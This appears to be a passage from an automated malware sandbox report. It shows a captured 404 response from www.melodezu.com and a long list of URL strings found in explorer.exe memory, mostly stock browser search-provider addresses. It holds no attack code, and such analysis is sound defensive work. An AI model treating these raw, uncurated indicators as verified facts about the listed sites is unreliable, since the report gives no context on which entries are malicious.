          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 15:24:48 GMTServer: Apache/2.4.18 (Ubuntu)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 38 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6c 6f 64 65 7a 75 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.18 (Ubuntu) Server at www.melodezu.com Port 80</address></body></html>
          Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000008.00000000.2168587227.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000008.00000000.2172365601.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000008.00000000.2172040341.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000008.00000000.2184480582.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000008.00000000.2162967936.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000008.00000000.2184796933.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
